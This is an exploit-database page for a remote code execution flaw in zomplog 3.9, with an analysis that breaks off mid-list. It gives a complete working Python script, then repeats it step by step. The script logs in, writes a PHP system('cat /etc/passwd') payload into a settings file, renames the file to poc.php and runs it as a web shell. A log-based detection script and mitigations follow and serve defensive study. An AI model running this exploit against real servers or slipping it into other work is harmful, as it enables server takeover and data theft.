zomplog 3.9 - Remote Code Execution (RCE)

Exploit Author: Mirabbas Ağalarov
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: Python
Published Date: 2023-07-28
#Exploit Title: zomplog 3.9 - Remote Code Execution (RCE)
#Application: zomplog 
#Version: v3.9
#Bugs:  RCE
#Technology: PHP
#Vendor URL: http://zomp.nl/zomplog/
#Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
#Date found: 22.07.2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 


import sys
from urllib.parse import quote_plus

import requests

# inputs: the vulnerable actions sit behind the login, so valid credentials are required
username = input('username: ')
password = input('password: ')

# urls: the published script targets a local install under /zimplitcms/; change
# base_url to match the target deployment
base_url = "http://localhost/zimplitcms"
login_url = f"{base_url}/zimplit.php?action=login"
# saveE writes the submitted 'html' parameter into the named file under the web root
payload_url = f"{base_url}/zimplit.php?action=saveE&file=Zsettings.js"
# rename gives the written file a .php extension, so the web server will execute it
rename_url = f"{base_url}/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"
poc_url = f"{base_url}/poc.php"

# login: a Session keeps the cookies the application sets, so the later requests
# are made as the authenticated user
session = requests.Session()
# credentials are form-encoded so characters such as '&' or '%' do not break the body
login_data = f"lang=en&username={quote_plus(username)}&password={quote_plus(password)}&submit=Start!"
headers = {
    'Cookie': 'ZsessionLang=en',
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
}
login_req = session.post(login_url, headers=headers, data=login_data)

# a 200 only means the request was served; a rejected login may also return 200,
# so if the final step prints no command output, check this response body first
if login_req.status_code == 200:
    print('Login OK')
else:
    print('Login problem.')
    sys.exit(1)

# payload: the 'html' value is double URL-encoded. Decoded twice it is the new
# Zsettings.js content, with a PHP tag injected into the first assignment:
#   ZmaxpicZoomW = ""<?php echo system('cat /etc/passwd');?>";
#   ZmaxpicZoomH = "150";
#   ZmaxpicW = "800";
#   ZmaxpicH = "800";
payload_data = "html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"
pheaders = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
}
payload_req = session.post(payload_url, headers=pheaders, data=payload_data)

# rename: Zsettings.js -> poc.php
rename_req = session.get(rename_url)

# poc: request the renamed file; the server executes the embedded PHP and the
# response carries the command output
poc_req = session.get(poc_url)
print(poc_req.text)


#youtube poc video - https://youtu.be/nn7hieGyCFs


zomplog 3.9 – Remote Code Execution (RCE) Vulnerability: A Deep Dive into a Critical PHP-Based Web Application Flaw

On July 22, 2023, security researcher Mirabbas Ağalarov reported a Remote Code Execution (RCE) vulnerability in zomplog 3.9, a PHP-based web application distributed from http://zomp.nl/zomplog/. The flaw lets an authenticated user execute arbitrary system commands on the server as the web server account, which can lead to full compromise of the host. It arises from two weaknesses in the application's file-editing features working together: the content an authenticated user submits for a configuration file is written to disk under the web root without any filtering, and the accompanying rename action lets that file be given a .php extension, after which the web server executes it.

Understanding the Vulnerability: How RCE Works in zomplog 3.9

The saveE action lets an authenticated user overwrite the contents of a file under the web root, in this case the JavaScript configuration file Zsettings.js. The submitted content is written as-is, so PHP code can be placed in the file. On its own that is not yet code execution: the web server serves a .js file as static text. The second weakness is the rename action, which applies no restriction to the new file name, so the same file can be renamed to poc.php and turned into a web shell.

When the attacker submits content containing <?php echo system('cat /etc/passwd'); ?>, the PHP is stored verbatim in Zsettings.js. After the rename to poc.php, a request for that file is routed by the web server's handler mapping, which is keyed on the .php extension, to the PHP interpreter, and the embedded code runs. No execution-time extension check is bypassed here; the application simply never restricted the extension a written or renamed file may have.

Exploitation Workflow: Step-by-Step Breakdown

The exploit chains four steps: authentication, writing the payload into a file, renaming that file to a .php extension, and requesting it. Here is how the script performs them:


#inputs
username=input('username: ')
password=input('password: ')

#urls
login_url="http://localhost/zimplitcms/zimplit.php?action=login"
payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js"
rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"
poc_url="http://localhost/zimplitcms/poc.php"

Explanation: The script first collects credentials; the vulnerable actions are only reachable after login, so a valid account is required. The four URLs correspond to the four steps of the chain. Note that the published script hard-codes the path /zimplitcms/zimplit.php on localhost; the base path has to be adapted to the target installation.


#login 
session = requests.Session()
login_data=f"lang=en&username={username}&password={password}&submit=Start!"
headers={
    'Cookie' : 'ZsessionLang=en',
    'Content-Type' : 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
    }
login_req=session.post(login_url,headers=headers,data=login_data)

if login_req.status_code == 200:
    print('Login OK')
else:
    print('Login problem.')
    exit()

Explanation: The Session object keeps the cookies the application sets across requests, so the authenticated state carries over to the later steps (ZsessionLang=en is only the language preference, sent as a static header). The login is a standard form POST. The script treats a 200 status as success, but the status code alone does not prove authentication: a rejected login can also return 200 together with the login page. If the final step returns no command output, the login is the first thing to verify.


#payload
payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"
pheaders={
 'Content-Type' : 'application/x-www-form-urlencoded',
 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
 }
payload_req=session.post(payload_url,headers=pheaders,data=payload_data)

Explanation: The html parameter carries the new content of Zsettings.js. It is double URL-encoded (each %25 decodes to a literal %), which implies the application decodes the value a second time before writing it. Decoded twice, the content is the normal set of Zmaxpic* assignments with a PHP tag injected into the first one: ZmaxpicZoomW = ""<?php echo system('cat /etc/passwd');?>";. The chosen command prints /etc/passwd, the system's account list (not its password hashes, which live in /etc/shadow); it is used because it is present on every Linux host and its output is unmistakable. Any other command could be substituted.


#rename
rename_req=session.get(rename_url)

Explanation: After the file is written, the attacker uses the rename action to change Zsettings.js to poc.php. The endpoint performs no allowlisting of the target extension, so the attacker can pick one the web server maps to the PHP interpreter. This is the step that turns a static .js file containing PHP text into an executable script.


#poc
poc_req=session.get(poc_url)
print(poc_req.text)

Explanation: Finally, the attacker requests the renamed file. The PHP interpreter runs the embedded code and the response contains the output of cat /etc/passwd, confirming command execution as the web server's user.
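As an added example (this is not part of the published exploit or of the analysis), the following Python shows what the three-step chain looks like in web server access logs and how a detector can correlate it per client. The log lines are constructed to mirror the requests the script makes, in Apache/nginx combined log format; the paths follow the script's hard-coded /zimplitcms/ layout, and the function names and severities are my own.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format as written by Apache and nginx. Request bodies are not logged,
# so the saveE payload itself is invisible here; the chain is detected from the query
# strings and from the follow-up request to the renamed file instead.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Names the web server would hand to the PHP interpreter. The trailing (\.|$) also
# catches poc.php.txt, which Apache executes when AddHandler is used for .php.
EXEC_NAME_RE = re.compile(r'\.(php\d?|phtml|phar)(\.|$)', re.IGNORECASE)


def is_executable_name(name):
    return EXEC_NAME_RE.search(name) is not None


def parse_line(line):
    """Split one access log line into client IP, script path, decoded query and status."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    url = urlsplit(rec['path'])
    rec['script'] = url.path
    # parse_qs decodes one layer; unquote once more so double-encoded names still match
    rec['query'] = {k: unquote(v[0]) for k, v in parse_qs(url.query).items()}
    return rec


def detect_write_rename_execute(lines):
    """Return (severity, ip, message) alerts for the saveE -> rename -> request chain."""
    alerts = []
    written = {}   # ip -> files overwritten through action=saveE
    renamed = {}   # ip -> files that client renamed to an executable name
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, q = rec['ip'], rec['query']
        action = q.get('action')
        if action == 'saveE' and 'file' in q:
            written.setdefault(ip, set()).add(q['file'])
        elif action == 'rename' and 'newname' in q:
            old, new = q.get('oldname', ''), q['newname']
            if is_executable_name(new):
                renamed.setdefault(ip, set()).add(new.rsplit('/', 1)[-1])
                # renaming a file the same client just wrote is the full chain
                severity = 'high' if old in written.get(ip, set()) else 'medium'
                alerts.append((severity, ip, f'rename to executable name: {old} -> {new}'))
        else:
            # execution step: the client requests the file it renamed and gets a 200
            name = rec['script'].rsplit('/', 1)[-1]
            if name in renamed.get(ip, set()) and rec['status'] == '200':
                alerts.append(('critical', ip, f'renamed file {name} requested and served'))
    return alerts


# Constructed sample: the exploit's four requests from one client, then benign traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Jul/2023:14:01:02 +0000] "POST /zimplitcms/zimplit.php?action=login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [22/Jul/2023:14:01:05 +0000] "POST /zimplitcms/zimplit.php?action=saveE&file=Zsettings.js HTTP/1.1" 200 14 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [22/Jul/2023:14:01:06 +0000] "GET /zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php HTTP/1.1" 200 14 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [22/Jul/2023:14:01:07 +0000] "GET /zimplitcms/poc.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [22/Jul/2023:14:05:00 +0000] "GET /zimplitcms/zimplit.php?action=rename&oldname=old.css&newname=new.css HTTP/1.1" 200 14 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [22/Jul/2023:14:05:10 +0000] "GET /zimplitcms/index.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for alert in detect_write_rename_execute(SAMPLE_LOG):
        print(alert)
```

The rename to an executable name is alertable on its own, because a content editor has no legitimate reason to produce .php files; the saveE correlation only raises the severity, and the served request for the renamed file is the point at which the chain has completed.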

Technical Analysis: Why This is a Critical Flaw

Attack Vector                        Impact                                              Exploitability
-----------------------------------  --------------------------------------------------  ---------------------------------------------------
Authenticated file write (saveE)     Attacker-controlled content written under the       High (requires a valid login, no other setup)
                                     web root; combined with the rename below, full
                                     RCE, data exfiltration and server takeover
Unrestricted rename (rename)         Written file given a .php extension, so the web     High (one GET request, file names are predictable)
                                     server passes it to the PHP interpreter
Missing content filtering            PHP open tags accepted verbatim in file content     High (no filtering at all; only matters because
                                                                                         the rename is unrestricted)

Key Insight: Neither weakness is fatal alone. Writing PHP text into a .js file produces a static file, and renaming a harmless file to .php produces a harmless script. Together they give an authenticated user a web shell, because the application trusts both the content and the file name it receives. The control that breaks the chain is restricting what a file may be named; filtering content is a second layer.

Security Recommendations and Mitigations

  • Extension allowlisting: the rename action (and any save action that takes a file name) should accept only an allowlist of non-executable extensions such as .js, .css and .html, applied to the whole file name so that names like poc.php.js are rejected as well, and should never allow .php, .phtml, .phar or .htaccess. This is the control that actually breaks the chain.
  • Content filtering as a second layer: content written into editable files can be refused if it contains a PHP open tag (<?php, <?=). On its own this is weak, since it depends on matching every form the interpreter accepts, so it supplements the allowlist rather than replacing it.
  • Execution controls on the directory: disable PHP execution for the directory that holds user-editable files in the web server configuration (for example, with mod_php, php_admin_flag engine off for that directory, or by removing the PHP handler there), or store those files outside the web root altogether.
  • Regular audits: review and test every code path that takes a file name or file content from the user, in this application and in similar file-based configuration systems.

Expert Tip: A non-PHP extension does not make user-controlled content safe; it only keeps the content inert for as long as nothing can change the file's name or the server's handler mapping. Web servers decide what to execute from the file name and their configuration, not from the file's contents, so every path by which a user can influence a name (rename, upload, save) or the configuration (a writable .htaccess) has to be guarded.

Real-World Implications

zomplog is a PHP application for managing web content and settings. Where version 3.9 is deployed in production, this flaw could lead to:

  • Server compromise: